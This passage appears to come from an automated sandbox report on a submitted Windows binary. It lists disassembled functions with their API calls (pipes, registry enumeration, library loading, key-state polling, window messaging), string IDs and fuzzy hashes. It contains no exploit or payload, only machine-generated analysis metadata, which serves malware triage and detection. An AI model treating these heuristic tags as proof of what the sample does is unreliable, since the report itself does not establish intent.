                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                          • String ID: SysAnimate32
                                                                          • API String ID: 4146253029-1011021900
                                                                          • Opcode ID: a55dd0ca2c601f75e223aa91b23755ef0813b06cd833d0876aed76577f8f6dfe
                                                                          • Instruction ID: e3d65047198bbc1943dc811169ba570d80b11e192c45eba04dd337b2d5044979
                                                                          • Opcode Fuzzy Hash: a55dd0ca2c601f75e223aa91b23755ef0813b06cd833d0876aed76577f8f6dfe
                                                                          • Instruction Fuzzy Hash: F5219D71201205BFEF124FA5DC82EBB37ADEB58724F114629FA10D60A0D771DC519760
                                                                          Function 00376D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00376DBC
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00376DEF
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00376E01
                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00376E3B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: d33c3f3343ef3ae665e11a5b86b1141013a41dd76311d53169b331d8cebcc1bc
                                                                          • Instruction ID: 5930a97893891932d8758c66d033365935557d8bba565d41be31b4665a30a210
                                                                          • Opcode Fuzzy Hash: d33c3f3343ef3ae665e11a5b86b1141013a41dd76311d53169b331d8cebcc1bc
                                                                          • Instruction Fuzzy Hash: A421C774600609AFDB329F29DC16B997BF8EF44720F208A1AFCA5D72D0D7759950CB50
                                                                          Function 00376E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00376E89
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00376EBB
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00376ECC
                                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00376F06
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: ec3f4157a8fa3b1b0d3e85c46c3fbe6967f9d71a378efbdebdfadbf218546671
                                                                          • Instruction ID: 8e407e06f5e39e0a78e4fcfc2f688426ef23816ba30f1bd88537971fed743fe7
                                                                          • Opcode Fuzzy Hash: ec3f4157a8fa3b1b0d3e85c46c3fbe6967f9d71a378efbdebdfadbf218546671
                                                                          • Instruction Fuzzy Hash: 8D21C4795007059FDB329F69CD16A9A77E8EF44720F208A1AFCE4D72D0D775A840C761
                                                                          Function 0037AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0037AC54
                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0037ACA8
                                                                          • __swprintf.LIBCMT ref: 0037ACC1
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0039F910), ref: 0037ACFF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                          • String ID: %lu
                                                                          • API String ID: 3164766367-685833217
                                                                          • Opcode ID: da38324d1594b02ff583b07cf13c1bc666dc8484cb1ed1697e730574911a8a74
                                                                          • Instruction ID: da6f3ea248e7e75700981a9f83d180d9012a629762da8f8b4ca30b3565e13847
                                                                          • Opcode Fuzzy Hash: da38324d1594b02ff583b07cf13c1bc666dc8484cb1ed1697e730574911a8a74
                                                                          • Instruction Fuzzy Hash: 74217131A00109EFCB11EF64C985EEE7BBCEF89314B108069F909EB251DB31EA41CB61
                                                                          Function 00371142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0036FCED,?,00370D40,?,00008000), ref: 0037115F
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0036FCED,?,00370D40,?,00008000), ref: 00371184
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0036FCED,?,00370D40,?,00008000), ref: 0037118E
                                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,0036FCED,?,00370D40,?,00008000), ref: 003711C1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CounterPerformanceQuerySleep
                                                                          • String ID: @7
                                                                          • API String ID: 2875609808-2194182032
                                                                          • Opcode ID: 50f5a1c9766c70be2e4843b399feb19c75f36e83254a9ee32907a85208afec8f
                                                                          • Instruction ID: 83e9ecf4f3920d8b9074923d5220b11948035f8f24ce30273df0585a3368b63d
                                                                          • Opcode Fuzzy Hash: 50f5a1c9766c70be2e4843b399feb19c75f36e83254a9ee32907a85208afec8f
                                                                          • Instruction Fuzzy Hash: 41113C32D0051DDBCF129FA9D889AEEBBBCFF09711F418056EA49BA240CB749550CBD5
                                                                          Function 00371AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00371B19
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                          • API String ID: 3964851224-769500911
                                                                          • Opcode ID: 7564903faee4b5ee8bbb14aae1e9bfc773f605e3afdf82babd48088672f21607
                                                                          • Instruction ID: d78b16d5ad144d8144c829458755e1fa196b2fa3042d73f55c9f18b7e6034a8c
                                                                          • Opcode Fuzzy Hash: 7564903faee4b5ee8bbb14aae1e9bfc773f605e3afdf82babd48088672f21607
                                                                          • Instruction Fuzzy Hash: E51188359102088FCF06EF58D8519FEB7B4FF66304F148469D8159B651EB325D06CB54
                                                                          Function 0038EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0038EC07
                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0038EC37
                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0038ED6A
                                                                          • CloseHandle.KERNEL32(?), ref: 0038EDEB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                          • String ID:
                                                                          • API String ID: 2364364464-0
                                                                          • Opcode ID: d0fdc79f59fc36636a4cafcdb0d569fed8fb0c68173db530d0147dc4b1030866
                                                                          • Instruction ID: d72d5934c4334a8328e03ce231f1083b45440e16ff00380cb3708afdbd9a4deb
                                                                          • Opcode Fuzzy Hash: d0fdc79f59fc36636a4cafcdb0d569fed8fb0c68173db530d0147dc4b1030866
                                                                          • Instruction Fuzzy Hash: BF8191716043009FD726EF28C896F6AB7E5AF48710F04881EF999DB292D770AC45CB81
                                                                          Function 00390037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 00390E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038FDAD,?,?), ref: 00390E31
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003900FD
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039013C
                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00390183
                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 003901AF
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003901BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                          • String ID:
                                                                          • API String ID: 3440857362-0
                                                                          • Opcode ID: e76c1101f03e69d912ee7a18e89a5fe2653494ea8c86a9e1d2bb6d8f66b7a7c7
                                                                          • Instruction ID: 8044ca5e3b92e7f9e071830e3fee5117c4ce24a6fd11bf4026985562fcf72e6a
                                                                          • Opcode Fuzzy Hash: e76c1101f03e69d912ee7a18e89a5fe2653494ea8c86a9e1d2bb6d8f66b7a7c7
                                                                          • Instruction Fuzzy Hash: E0514E71208205AFDB1AEF58C881FABB7E9FF88314F44491DF5968B291DB31E944CB52
                                                                          Function 0038D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0038D927
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0038D9AA
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0038D9C6
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0038DA07
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0038DA21
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00377896,?,?,00000000), ref: 00315A2C
                                                                            • Part of subcall function 00315A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00377896,?,?,00000000,?,?), ref: 00315A50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 327935632-0
                                                                          • Opcode ID: 3f62ac3bba3251339e962c99713c5413de5bc9d291555c1f71a4b315fc1ad7c9
                                                                          • Instruction ID: 58cc5a63dbe4dd9c57374385dbe3f436774f1553c50b8bf989a5d04df71ead29
                                                                          • Opcode Fuzzy Hash: 3f62ac3bba3251339e962c99713c5413de5bc9d291555c1f71a4b315fc1ad7c9
                                                                          • Instruction Fuzzy Hash: F4513935A04205DFCB06EFA8C4849ADB7B8FF4D310B1580A6E859AB352D731ED85CF91
                                                                          Function 0037E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0037E61F
                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0037E648
                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0037E687
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0037E6AC
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0037E6B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1389676194-0
                                                                          • Opcode ID: ee306bd90225c4ddc35f4f5cbb7248404ca758d03904e3872a24d3a4fd3b7a6f
                                                                          • Instruction ID: a1a9572e805b501b88491cac2a5d45d986f2acefcadf39d070249b760c3a4b6d
                                                                          • Opcode Fuzzy Hash: ee306bd90225c4ddc35f4f5cbb7248404ca758d03904e3872a24d3a4fd3b7a6f
                                                                          • Instruction Fuzzy Hash: 26510635A00205DFCB06EF64C991AAEBBF5EF0D314F1480A9E849AB362CB31ED51CB50
                                                                          Function 0039A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bf94da36eab5c0fabeb3ecca5907d4c172fdd1e1d0c97a130df4d3adbe302781
                                                                          • Instruction ID: ab8ff788495d6f0c00bbdc945a1574268872404f1d9715317580fb22b0bcdce6
                                                                          • Opcode Fuzzy Hash: bf94da36eab5c0fabeb3ecca5907d4c172fdd1e1d0c97a130df4d3adbe302781
                                                                          • Instruction Fuzzy Hash: DF41D935905914AFDF12DF28DC48FA9BBA8EB09310F160366F816E72E1C7309D41DAD1
                                                                          Function 00312344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 00312357
                                                                          • ScreenToClient.USER32(003D57B0,?), ref: 00312374
                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00312399
                                                                          • GetAsyncKeyState.USER32(00000002), ref: 003123A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                          • String ID:
                                                                          • API String ID: 4210589936-0
                                                                          • Opcode ID: 79c6036e831c54639991da22e2c5bc9e869268c863b1e1af2266e5be04eab656
                                                                          • Instruction ID: 654fec87e83cc74661ee138b216fe7db42383c8ec6767d63b67be1c48d7142e0
                                                                          • Opcode Fuzzy Hash: 79c6036e831c54639991da22e2c5bc9e869268c863b1e1af2266e5be04eab656
                                                                          • Instruction Fuzzy Hash: 02416335504105FFCF1A9F69C844AEEBBB4FB09360F114316F83996190C735A9A4DB91
                                                                          Function 003663AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003663E7
                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00366433
                                                                          • TranslateMessage.USER32(?), ref: 0036645C
                                                                          • DispatchMessageW.USER32(?), ref: 00366466
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00366475
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                          • String ID:
                                                                          • API String ID: 2108273632-0
                                                                          • Opcode ID: 0ca917a4b6ede8d03e5df1e45d4ca83115cd79eddcad6b9b261d98a699849804
                                                                          • Instruction ID: cce45f0167d44984d5d92a96da34f869fadb7b294bf990b237a41e822da1dc61
                                                                          • Opcode Fuzzy Hash: 0ca917a4b6ede8d03e5df1e45d4ca83115cd79eddcad6b9b261d98a699849804
                                                                          • Instruction Fuzzy Hash: A731D631A01646AFDB27CF72DC46BF67BBCAB01380F25816AE421C31A5EB359489D760
                                                                          Function 00368A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00368A30
                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00368ADA
                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00368AE2
                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00368AF0
                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00368AF8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostSleep$RectWindow
                                                                          • String ID:
                                                                          • API String ID: 3382505437-0
                                                                          • Opcode ID: 1dbb7d2f5832c5deed31e62f2ea361ead5fef5137ae9370932cea657e6033a65
                                                                          • Instruction ID: 6d255ba1bd332c901ca9db6e170a99ef175bf3341c9066d093858cd21cccd280
                                                                          • Opcode Fuzzy Hash: 1dbb7d2f5832c5deed31e62f2ea361ead5fef5137ae9370932cea657e6033a65
                                                                          • Instruction Fuzzy Hash: 6031CE71500219EFDF15CFA8D94CA9E7BB9EB08315F10822AF925EB2D4C7B09D54DB90
                                                                          Function 0036B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 0036B204
                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0036B221
                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0036B259
                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0036B27F
                                                                          • _wcsstr.LIBCMT ref: 0036B289
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                          • String ID:
                                                                          • API String ID: 3902887630-0
                                                                          • Opcode ID: 252b38b971751b39a8d1ba635d56c3997386c776c1bbda2653c3c5fdb3f0a379
                                                                          • Instruction ID: 5dac2fce8fa728a9ed3c73b7bd5f96444c884ef5c470eafbccaec2d07b0a72bf
                                                                          • Opcode Fuzzy Hash: 252b38b971751b39a8d1ba635d56c3997386c776c1bbda2653c3c5fdb3f0a379
                                                                          • Instruction Fuzzy Hash: 6821C571204210BBEB175B799C59E7FBBECDF49750F01813AF805DE165EB61DC809A60
